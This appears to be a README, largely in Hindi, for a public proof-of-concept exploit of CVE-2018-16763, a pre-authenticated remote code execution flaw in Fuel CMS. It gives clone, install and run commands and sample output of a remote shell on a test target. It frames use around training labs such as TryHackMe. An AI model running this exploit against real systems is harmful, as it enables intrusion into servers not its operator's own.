
CVE-2018-16763 (Fuel CMS - Preauthenticated Remote Code Execution) के लिए एक Proof-of-Concept (PoC) शोषण।
CVE-2018-16763 (Fuel CMS - प्री-ऑथेंटिकेटेड रिमोट कोड एक्जीक्यूशन) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट।
यह Python 3 प्रोग्राम Fuel CMS सामग्री प्रबंधन प्रणाली में CVE-2018-16763 भेद्यता के लिए एक PoC के रूप में कार्य करता है। विशेष रूप से, यह भेद्यता pages/select/filter पैरामीटर के माध्यम से PHP कोड मूल्यांकन की अनुमति देती है (इस PoC में लागू किया गया है), जिससे प्री-ऑथेंटिकेटेड रिमोट कोड एक्जीक्यूशन होता है, जो एक महत्वपूर्ण सिस्टम भेद्यता है।
git clone https://github.com/saccles/CVE-2018-16763-Proof-of-Concept.git
cd CVE-2018-16763-Proof-of-Concept
python3 -m pip install -r requirements.txt
एक असुरक्षित लक्ष्य के विरुद्ध एक्सप्लॉइट स्क्रिप्ट चलाएँ। (स्क्रिप्ट केवल उस लक्ष्य के विरुद्ध चलाएँ जो आपका स्वयं का है या TryHackMe, HackTheBox, या किसी अन्य नैतिक हैकिंग वेबसाइट द्वारा प्रदान किया गया है!) मैं अधिक जानकारी के लिए TryHackMe के "Ignite" चैलेंज को देखने की सलाह देता हूँ। आप असुरक्षित Fuel CMS एप्लिकेशन को exploit-db.com से भी डाउनलोड कर सकते हैं।
python3 CVE-2018-16763.py -u URL
[DEBUG] Connecting to http://10.10.60.46 ...
[DEBUG] Succesfully connected!
Enter Command:
$ ls -la
total 52
drwxrwxrwx 4 root root 4096 Jul 26 2019 .
drwxr-xr-x 3 root root 4096 Jul 26 2019 ..
-rw-r--r-- 1 root root 163 Jul 26 2019 .htaccess
-rwxrwxrwx 1 root root 1427 Jul 26 2019 README.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 assets
-rwxrwxrwx 1 root root 193 Jul 26 2019 composer.json
-rwxrwxrwx 1 root root 6502 Jul 26 2019 contributing.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 fuel
-rwxrwxrwx 1 root root 11802 Jul 26 2019 index.php
-rwxrwxrwx 1 root root 30 Jul 26 2019 robots.txt
python3 CVE-2018-16763.py -h
usage: CVE-2018-16763.py [-h] -u URL
This tool exploits CVE-2018-16763 on Fuel CMS.
options:
-h, --help show this help message and exit
-u URL, --url URL Fuel CMS url.
Silas Accles [saccles]
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE.md फ़ाइल देखें।
Exploit-DB प्रोग्राम, Vozec के PoC स्क्रिप्ट, और Padsala Trushal द्वारा विकसित मूल PoC से काफी प्रेरित।